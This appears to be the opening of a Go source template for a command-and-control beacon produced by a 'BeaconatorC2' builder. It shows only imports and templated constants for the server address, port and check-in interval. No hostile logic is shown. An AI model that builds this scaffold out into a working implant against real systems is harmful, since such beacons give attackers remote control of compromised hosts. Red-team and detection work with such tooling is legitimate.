// Go Beacon - Generated by BeaconatorC2 Beacon Builder
package main

import (
	"bytes"
	"crypto/md5"
	"encoding/hex"
	"fmt"
	"io"
	"io/ioutil"
	"log"
	"math/rand"
	"net"
	"os"
	"os/exec"
	"os/user"
	"path/filepath"
	"runtime"
	"strconv"
	"strings"
	"time"
)

// Configuration constants (substituted during build)
const (
	DefaultServerIP      = "{{server_ip}}"
	DefaultServerPort    = {{server_port}}
	DefaultCheckInterval = {{checkin_interval}}
	SchemaFile           = "{{schema_filename}}"
)
